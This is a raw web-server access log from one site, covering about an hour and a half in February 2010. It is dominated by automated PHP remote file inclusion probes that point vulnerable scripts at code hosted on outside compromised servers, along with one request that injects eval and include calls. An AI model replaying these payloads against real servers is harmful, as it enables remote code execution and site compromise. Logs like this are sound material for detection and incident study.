207.218.200.0 - - [01/Feb/2010:11:14:44 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.218.200.0 - - [01/Feb/2010:11:14:44 -0800] "GET /logs/access.log//include/prodler.class.php?sPath=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.218.200.0 - - [01/Feb/2010:11:14:44 -0800] "GET /include/prodler.class.php?sPath=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.218.200.0 - - [01/Feb/2010:11:14:50 -0800] "GET /logs/access_091101.log//include/prodler.class.php?sPath=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:11:15:07 -0800] "GET /logs/access_091201.log/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:11:15:07 -0800] "GET /logs/access_090731.log/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:11:15:07 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:11:15:07 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
203.251.225.152 - - [01/Feb/2010:11:17:43 -0800] "GET /include/prodler.class.php?sPath=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../id?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
207.218.200.0 - - [01/Feb/2010:11:19:17 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
207.218.200.0 - - [01/Feb/2010:11:19:17 -0800] "GET /include/prodler.class.php?sPath=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
207.218.200.0 - - [01/Feb/2010:11:19:17 -0800] "GET /logs/access_091101.log//include/prodler.class.php?sPath=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
207.218.200.0 - - [01/Feb/2010:11:19:22 -0800] "GET /logs/access_091201.log//include/prodler.class.php?sPath=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.88.4.141 - - [01/Feb/2010:11:22:24 -0800] "GET /skin/zero_vote/error.php?dir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
121.88.4.141 - - [01/Feb/2010:11:22:24 -0800] "GET /logs/access_090801.log%20%20//skin/zero_vote/error.php?dir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
121.88.4.141 - - [01/Feb/2010:11:22:24 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.199.242.22 - - [01/Feb/2010:11:23:58 -0800] "GET /skin/zero_vote/error.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.199.242.22 - - [01/Feb/2010:11:24:09 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.199.242.22 - - [01/Feb/2010:11:24:09 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.251.225.152 - - [01/Feb/2010:11:25:18 -0800] "GET /logs/access.log//include/prodler.class.php?sPath=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../id?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
203.251.225.152 - - [01/Feb/2010:11:25:19 -0800] "GET /include/prodler.class.php?sPath=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../id?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
203.251.225.152 - - [01/Feb/2010:11:25:19 -0800] "GET /logs//include/prodler.class.php?sPath=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../id?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:11:27:03 -0800] "GET /logs/access_090330.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:11:27:03 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:11:27:04 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.251.225.152 - - [01/Feb/2010:11:27:35 -0800] "GET /logs/access_091201.log//include/prodler.class.php?sPath=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../id?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
121.88.4.141 - - [01/Feb/2010:11:28:04 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.88.4.141 - - [01/Feb/2010:11:28:04 -0800] "GET /skin/zero_vote/error.php?dir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.88.4.141 - - [01/Feb/2010:11:28:04 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.45.154.10 - - [01/Feb/2010:11:28:52 -0800] "GET /logs/access_091201.log/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.45.154.10 - - [01/Feb/2010:11:28:53 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
202.45.154.10 - - [01/Feb/2010:11:28:53 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:11:29:23 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:11:29:23 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:11:29:23 -0800] "GET /logs/access_090329.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.45.154.10 - - [01/Feb/2010:11:29:25 -0800] "GET /logs/access_091201.log/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.45.154.10 - - [01/Feb/2010:11:29:31 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
202.45.154.10 - - [01/Feb/2010:11:29:31 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
202.45.154.10 - - [01/Feb/2010:11:29:42 -0800] "GET /logs/access_090731.log/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:11:29:44 -0800] "GET /logs/access_090329.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:11:29:44 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:11:29:44 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.45.154.10 - - [01/Feb/2010:11:29:45 -0800] "GET /logs/access_090731.log/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.113.28.196 - - [01/Feb/2010:11:34:51 -0800] "GET / HTTP/1.1" 200 916 "http://www.google.cl/url?sa=t&source=web&ct=res&cd=1&ved=0CAcQFjAA&url=http%3A%2F%2Fwww.wirama.com%2F&rct=j&q=Wirama&ei=1yxnS8alE4iVtgeLp_S3Bg&usg=AFQjCNFGIOsgrXtw71XCfOzX7ag_Hp9_fg" "Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.wirama.com"
200.113.28.196 - - [01/Feb/2010:11:34:51 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.wirama.com"
200.113.28.196 - - [01/Feb/2010:11:34:54 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.wirama.com"
200.113.28.196 - - [01/Feb/2010:11:34:54 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://www.wirama.com/" "Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.wirama.com"
200.113.28.196 - - [01/Feb/2010:11:34:56 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/tmp/" "Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.wirama.com"
200.113.28.196 - - [01/Feb/2010:11:34:57 -0800] "GET /logs/ HTTP/1.1" 200 3941 "http://www.wirama.com/" "Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.wirama.com"
200.113.28.196 - - [01/Feb/2010:11:34:59 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/logs/" "Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.wirama.com"
200.113.28.196 - - [01/Feb/2010:11:35:01 -0800] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.wirama.com"
200.113.28.196 - - [01/Feb/2010:11:35:02 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/_private/" "Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.wirama.com"
200.113.28.196 - - [01/Feb/2010:11:35:04 -0800] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.wirama.com"
200.113.28.196 - - [01/Feb/2010:11:35:05 -0800] "GET /_private/form_results.csv HTTP/1.1" 200 0 "http://www.wirama.com/_private/" "Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:11:36:42 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:11:36:42 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:11:36:42 -0800] "GET /logs/access_090331.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:11:36:52 -0800] "GET /logs/access_090801.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.251.225.152 - - [01/Feb/2010:11:38:37 -0800] "GET /logs/access.log//include/prodler.class.php?sPath=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../id?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
203.251.225.152 - - [01/Feb/2010:11:38:37 -0800] "GET /include/prodler.class.php?sPath=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../id?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
203.251.225.152 - - [01/Feb/2010:11:38:38 -0800] "GET /logs//include/prodler.class.php?sPath=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../id?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
200.113.28.196 - - [01/Feb/2010:11:39:53 -0800] "GET / HTTP/1.1" 200 916 "http://www.bizorigin.com/2007/wirama-rfid-antennareader-enabler-raises-1m-in-series-a-financing" "Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7" "www.wirama.com"
203.251.225.152 - - [01/Feb/2010:11:41:00 -0800] "GET /logs/access_091201.log//include/prodler.class.php?sPath=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../id?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:11:41:32 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:11:41:32 -0800] "GET /logs/access_090329.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:11:41:32 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:11:43:55 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:11:43:55 -0800] "GET /logs/access_090329.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:11:43:55 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:11:44:55 -0800] "GET /logs/access_090801.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:11:46:58 -0800] "GET /logs/access_090801.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.46.199.182 - - [01/Feb/2010:11:47:27 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
69.90.47.134 - - [01/Feb/2010:12:01:51 -0800] "GET /logs/access_091031.log//login.php?dir=http://www.kt13.co.kr/home/img/icon_09.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.90.47.134 - - [01/Feb/2010:12:01:51 -0800] "GET /logs//login.php?dir=http://www.kt13.co.kr/home/img/icon_09.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.90.47.134 - - [01/Feb/2010:12:01:51 -0800] "GET /login.php?dir=http://www.kt13.co.kr/home/img/icon_09.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:12:03:32 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:12:03:32 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:12:03:32 -0800] "GET /logs/access_091101.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:12:03:32 -0800] "GET /logs/access_090401.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:12:04:05 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:12:04:05 -0800] "GET /logs/access_091101.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:12:04:05 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:12:04:09 -0800] "GET /logs/access_090401.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:12:15:48 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:12:15:48 -0800] "GET //appserv/main.php?appserv_root=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:12:15:48 -0800] "GET /logs/access_090801.log///appserv/main.php?appserv_root=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:12:16:09 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:12:16:09 -0800] "GET /logs/access_090801.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:12:16:10 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
58.150.99.131 - - [01/Feb/2010:12:16:26 -0800] "GET /logs/access_091031.log///appserv/main.php?appserv_root=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:12:17:07 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:12:17:08 -0800] "GET /logs/access_090330.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:12:17:08 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:12:20:22 -0800] "GET /logs/access_090329.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:12:20:35 -0800] "GET /logs/access_090801.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:12:20:35 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:12:20:35 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:12:20:36 -0800] "GET /logs/access_090601.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:12:20:36 -0800] "GET /logs/access_090329.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:12:22:21 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:12:22:21 -0800] "GET /logs/access_090331.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:12:22:21 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:12:22:30 -0800] "GET /logs/access_090801.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.237.78.123 - - [01/Feb/2010:12:24:54 -0800] "GET /logs/access_090330.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.237.78.123 - - [01/Feb/2010:12:24:54 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.237.78.123 - - [01/Feb/2010:12:24:54 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.237.78.123 - - [01/Feb/2010:12:24:54 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.237.78.123 - - [01/Feb/2010:12:24:54 -0800] "GET /logs/access_090330.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.237.78.123 - - [01/Feb/2010:12:24:54 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.237.78.123 - - [01/Feb/2010:12:25:23 -0800] "GET /logs/access_090329.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.237.78.123 - - [01/Feb/2010:12:25:27 -0800] "GET /logs/access_090329.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:12:28:39 -0800] "GET /logs/access_090330.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:12:33:47 -0800] "GET /logs/access_090329.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
